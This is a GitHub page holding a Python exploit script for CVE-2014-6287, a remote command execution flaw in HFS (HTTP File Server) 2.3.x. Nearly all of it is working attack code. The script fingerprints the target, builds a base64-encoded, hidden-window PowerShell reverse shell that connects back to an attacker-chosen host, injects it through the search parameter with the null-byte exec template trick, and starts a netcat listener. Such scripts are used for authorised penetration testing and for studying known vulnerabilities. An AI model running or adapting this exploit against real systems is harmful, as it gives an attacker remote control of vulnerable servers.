-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathhfs-2-3-exploit.py
95 lines (74 loc) · 3.56 KB
/
hfs-2-3-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution
# For x64 Reverse PowerShell Environment
# Date: 04/04/2023
# Rewrite of Pergyz 49584.py
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
# IMPORTS
import base64
import os, sys, time
import requests
import urllib.parse
# FOR DEBUGGING INTERCEPT WITH BURP
#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# GET GLOBAL VARIABLES
lhost = input("Local Host IP : ")
lport = input("Listen Port : ")
rhost = input("Remote Host IP : ")
rport = input("HTTP FileServer Port: ")
def check_url(rhost, rport):
# Check supplied URL is correct target
url = f"http://{rhost}:{rport}"
search_string = "HttpFileServer 2.3"
try:
response = requests.get(url, timeout=5) # Increase timeout if errors
response.raise_for_status()
if search_string in response.text:
print(f"[+] Target is online and appears to be {search_string}")
return True
else:
print(f"[!] Target doesn't appear to be {search_string}")
return False
except requests.exceptions.RequestException as e:
print(f"[!] Request failed with error: {e}")
return False
def build_exploit(rhost, rport, lhost, lport):
# Using Nishang's Invoke-PowerShellTcpOneLine.ps1
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
# Base64 encode and obfuscate command
encoded_command = base64.b64encode(command.encode('utf-16le')).decode()
# Payload for x64 Powershell Session
payload = f'exec|C:\Windows\sysnative\WindowsPowerShell\\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
# URL Encode for HTTP GET Request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{payload}.}}'
# Return the encoded URL + payload
return url
def start_netcat(lport):
print(f"[+] Starting Netcat on Port: {lport}")
print("\n\n!!!! --- Press Enter After Connection Established --- !!!!\n\n")
os.system(f'nc -nvlp {lport}')
def exploit(rhost, rport, lhost, lport):
print("\n[+] Checking URL Is HTTP FileServer 2.3...")
if check_url(rhost, rport):
print("[+} Building Exploit")
url = build_exploit(rhost, rport, lhost, lport)
listener_choice = input("[+] Do you want me to start a Netcat Listener for you? (Y/n): ") or 'y'
if listener_choice.lower() == 'y':
print("[+] Sending Exploit")
r = requests.get(url)
start_netcat(lport)
elif listener_choice.lower() == 'n':
print("[+] Sending Exploit")
r = requests.get(url)
else:
print("Unknown Input, Exiting...")
sys.exit(1)
else:
sys.exit(1)
exploit(rhost, rport, lhost, lport)